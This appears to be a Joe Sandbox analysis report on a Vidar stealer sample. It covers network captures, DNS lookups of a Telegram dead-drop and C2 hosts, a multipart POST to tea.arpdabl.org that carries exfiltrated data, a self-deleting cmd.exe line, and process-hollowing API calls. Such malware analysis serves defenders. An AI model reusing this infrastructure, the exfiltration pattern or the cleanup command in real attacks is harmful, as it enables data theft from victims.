Jul 3, 2024 02:22:49.399866104 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399873972 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399882078 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399890900 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399899006 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399908066 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399915934 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399924994 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399933100 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399946928 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399955988 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399964094 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399972916 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399981022 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399990082 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399997950 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400006056 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400013924 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400022984 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400032043 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400043964 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.400052071 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:50.622863054 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:50.622934103 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.764158010 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.764487028 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.769525051 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:50.769596100 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.769726992 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:50.769785881 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.770086050 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:50.774939060 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:51.483941078 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:51.484049082 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:51.484761953 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:51.486223936 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:51.489561081 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:51.491183996 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:52.148675919 CEST	5432	49184	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:52.148745060 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:52.182087898 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.186954975 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.187020063 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.187213898 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.187232018 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.192065001 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.192074060 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.192145109 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.199098110 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.199107885 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.199210882 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.823086023 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.823144913 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.823638916 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:52.823684931 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:52.827128887 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.127795935 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.736201048 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.867820978 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.867918015 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.867928982 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.867980003 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.868264914 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.868309975 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.871139050 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.871151924 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.871159077 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.871169090 CEST	80	49185	185.107.56.202	192.168.2.22
Jul 3, 2024 02:22:53.871294975 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.871294975 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.871294975 CEST	49185	80	192.168.2.22	185.107.56.202
Jul 3, 2024 02:22:53.872170925 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:53.877033949 CEST	80	49186	199.59.243.226	192.168.2.22
Jul 3, 2024 02:22:53.877101898 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:53.877269030 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:53.882056952 CEST	80	49186	199.59.243.226	192.168.2.22
Jul 3, 2024 02:22:54.343182087 CEST	80	49186	199.59.243.226	192.168.2.22
Jul 3, 2024 02:22:54.343245983 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:54.343272924 CEST	80	49186	199.59.243.226	192.168.2.22
Jul 3, 2024 02:22:54.343312979 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:56.245804071 CEST	49186	80	192.168.2.22	199.59.243.226
Jul 3, 2024 02:22:56.246126890 CEST	49184	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:56.246747971 CEST	49183	5432	192.168.2.22	116.202.180.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 02:22:19.342617035 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 3, 2024 02:22:19.382070065 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 3, 2024 02:22:52.160032988 CEST	57893	53	192.168.2.22	8.8.8.8
Jul 3, 2024 02:22:52.181680918 CEST	53	57893	8.8.8.8	192.168.2.22
Jul 3, 2024 02:22:52.829047918 CEST	54821	53	192.168.2.22	8.8.8.8
Jul 3, 2024 02:22:53.829914093 CEST	54821	53	192.168.2.22	8.8.8.8
Jul 3, 2024 02:22:53.871582031 CEST	53	54821	8.8.8.8	192.168.2.22
Jul 3, 2024 02:22:53.871592045 CEST	53	54821	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 02:22:19.342617035 CEST	192.168.2.22	8.8.8.8	0x2845	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:52.160032988 CEST	192.168.2.22	8.8.8.8	0x7a5d	Standard query (0)	tea.arpdabl.org	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:52.829047918 CEST	192.168.2.22	8.8.8.8	0xd165	Standard query (0)	survey-smiles.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:53.829914093 CEST	192.168.2.22	8.8.8.8	0xd165	Standard query (0)	survey-smiles.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 02:22:19.382070065 CEST	8.8.8.8	192.168.2.22	0x2845	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.23	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.59.36	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.59.35	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.35	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.34	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.38	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.489028931 CEST	8.8.8.8	192.168.2.22	0xb237	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.59.37	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.503882885 CEST	8.8.8.8	192.168.2.22	0xb7f4	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:21.503882885 CEST	8.8.8.8	192.168.2.22	0xb7f4	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:52.181680918 CEST	8.8.8.8	192.168.2.22	0x7a5d	No error (0)	tea.arpdabl.org	185.107.56.202	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:53.871582031 CEST	8.8.8.8	192.168.2.22	0xd165	No error (0)	survey-smiles.com	199.59.243.226	A (IP address)	IN (0x0001)	false
Jul 3, 2024 02:22:53.871592045 CEST	8.8.8.8	192.168.2.22	0xd165	No error (0)	survey-smiles.com	199.59.243.226	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

tea.arpdabl.org

survey-smiles.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49185	185.107.56.202	80	204	C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 02:22:52.187213898 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 Host: tea.arpdabl.org Content-Length: 4761 Connection: Keep-Alive Cache-Control: no-cache
Jul 3, 2024 02:22:52.187232018 CEST	1236	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 30 65 38 31 65 Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"f0e81e80e6f91df4ecf4887ed4e401e5------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="build_id"67fd81bf99f2a8aaa5bc79a1cfb25860------GHJEGCAEGIIIDH
Jul 3, 2024 02:22:52.192145109 CEST	3525	OUT	Data Raw: 78 48 70 33 2f 55 6d 63 76 63 4e 7a 34 4f 42 6f 4f 52 35 4f 75 65 66 37 70 6e 41 77 48 2f 64 55 34 33 52 59 66 56 54 47 39 7a 74 34 33 38 54 66 66 6d 2b 2f 4e 39 2b 5a 37 38 2f 33 2f 76 75 65 64 53 5a 77 6b 50 31 37 31 35 50 4e 49 7a 36 76 32 6e Data Ascii: xHp3/UmcvcNz4OBoOR5Ouef7pnAwH/dU43RYfVTG9zt438Tffm+/N9+Z78/3/vuedSZwkP1715PNIz6v2no5iPZVwkQi8+ofYMWAfwR2IZpVay09goGFS/DC86w+n3gyjYX8/8VLrRSKhuyx0KjHEaIARx2Y2hikZ6K8qSQRcqELO9RYcXs+DztZ3QWbGeHSCc1rnj9yBUNhFZCKbSRi1N/SzJDUrdImUYKLKFXYr3XfvsEVhFr
Jul 3, 2024 02:22:52.823086023 CEST	364	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Wed, 03 Jul 2024 00:22:52 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting
Jul 3, 2024 02:22:53.867928982 CEST	364	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Wed, 03 Jul 2024 00:22:52 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting
Jul 3, 2024 02:22:53.868264914 CEST	364	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Wed, 03 Jul 2024 00:22:52 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49186	199.59.243.226	80	204	C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 02:22:53.877269030 CEST	190	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 Host: survey-smiles.com Connection: Keep-Alive Cache-Control: no-cache
Jul 3, 2024 02:22:54.343182087 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 00:22:53 GMT content-type: text/html; charset=utf-8 content-length: 1050 x-request-id: baf82661-e91b-444a-95fc-a8abc3fa4f75 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bOyrtEQgEacVTQVL07rMryNWN/tdja5XEp5A+mj9aHBpIGKa59fGMZby2F36oMS5dP6jBJrMQZ/LFH1Jv93hKg== set-cookie: parking_session=baf82661-e91b-444a-95fc-a8abc3fa4f75; expires=Wed, 03 Jul 2024 00:37:54 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 4f 79 72 74 45 51 67 45 61 63 56 54 51 56 4c 30 37 72 4d 72 79 4e 57 4e 2f 74 64 6a 61 35 58 45 70 35 41 2b 6d 6a 39 61 48 42 70 49 47 4b 61 35 39 66 47 4d 5a 62 79 32 46 33 36 6f 4d 53 35 64 50 36 6a 42 4a 72 4d 51 5a 2f 4c 46 48 31 4a 76 39 33 68 4b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bOyrtEQgEacVTQVL07rMryNWN/tdja5XEp5A+mj9aHBpIGKa59fGMZby2F36oMS5dP6jBJrMQZ/LFH1Jv93hKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jul 3, 2024 02:22:54.343272924 CEST	484	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmFmODI2NjEtZTkxYi00NDRhLTk1ZmMtYThhYmMzZmE0Zjc1IiwicGFnZV90aW1lIjoxNzE5OTY2MTc0LCJwYWdlX3VybCI6I

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	149.154.167.99	443	204	C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Timestamp	Bytes transferred	Direction	Data
2024-07-03 00:22:20 UTC	85	OUT	GET /bu77un HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-07-03 00:22:20 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 03 Jul 2024 00:22:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12322 Connection: close Set-Cookie: stel_ssid=d1e222eee8c843edfb_3455152776784339756; expires=Thu, 04 Jul 2024 00:22:20 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-07-03 00:22:20 UTC	12322	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 62 75 37 37 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @bu77un</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Target ID:	0
Start time:	20:22:13
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\82xul16VKj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\82xul16VKj.exe"
Imagebase:	0x400000
File size:	1'608'192 bytes
MD5 hash:	EB2F14B68AA11A4AEA94985C87714811
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:22:15
Start date:	02/07/2024
Path:	C:\Users\user\AppData\Local\Temp\kat2B07.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\kat2B07.tmp
Imagebase:	0x400000
File size:	881'664 bytes
MD5 hash:	66064DBDB70A5EB15EBF3BF65ABA254B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:22:53
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
Imagebase:	0x4a910000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:22:54
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x220000
File size:	27'136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	51.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	64.1%
Total number of Nodes:	39
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02EEBEF0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 317
memoryfilenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 02EEBF61
GetTempFileNameA.KERNEL32(?,kate,00000000,?), ref: 02EEC114
CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 02EEC142
WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 02EEC16C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 02EEC1B6
NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 02EEC1D0
VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 02EEC1FB
WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 02EEC21F
WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 02EEC281
Wow64SetThreadContext.KERNEL32(?,00010002), ref: 02EEC2DA
ResumeThread.KERNELBASE(?), ref: 02EEC2EC
ExitProcess.KERNELBASE(00000000), ref: 02EEC2F9

Strings

kate, xrefs: 02EEC100, 02EEC103

Memory Dump Source

Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd

Yara matches

Similarity

API ID: Process$FileMemoryWrite$CreateThreadVirtual$AllocAllocateContextExitNameResumeSectionTempUnmapViewWow64
String ID: kate
API String ID: 805568384-4076676908
Opcode ID: f8ea1b00e8faf37c5129c5e81034ef3e4365e7e5ae890ed18d1e7004deb17f8e
Instruction ID: 093bb18f159d91000786c94422894ed8689c665f633e3ac8c42bb52cb96dc630
Opcode Fuzzy Hash: f8ea1b00e8faf37c5129c5e81034ef3e4365e7e5ae890ed18d1e7004deb17f8e
Instruction Fuzzy Hash: 9BE1D875A00209AFDB54CF84C895FEEB7B5BF88304F108199E909AB391D771AE85CF94

Function 02EEB250 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EEB9B0: VirtualAlloc.KERNELBASE(00000000,02EEB30F,00003000,00000040), ref: 02EEBA34

NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 02EEB41B
CloseHandle.KERNELBASE(00000000), ref: 02EEB4CC

Strings

@, xrefs: 02EEB39D

Memory Dump Source

Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd

Yara matches

Similarity

API ID: AllocCloseCreateFileHandleVirtual
String ID: @
API String ID: 1754036434-2766056989
Opcode ID: da227e9e93301028f75300d3467e18528c054984f706cc45e9426a4c5e36ed3a
Instruction ID: 286bd0f98a63379b700fe186c4bb88c72f133780637fd1b46be20d2be4823bce
Opcode Fuzzy Hash: da227e9e93301028f75300d3467e18528c054984f706cc45e9426a4c5e36ed3a
Instruction Fuzzy Hash: 9381FB71A40218EFDB24DF54CC95FDAB3B5BF88704F1481A9EA09AB290D7706A84CF94

Function 02EEB510 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.tex, xrefs: 02EEB5D4

Memory Dump Source

Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd

Yara matches

Similarity

API ID:
String ID: .tex
API String ID: 0-1946526065
Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
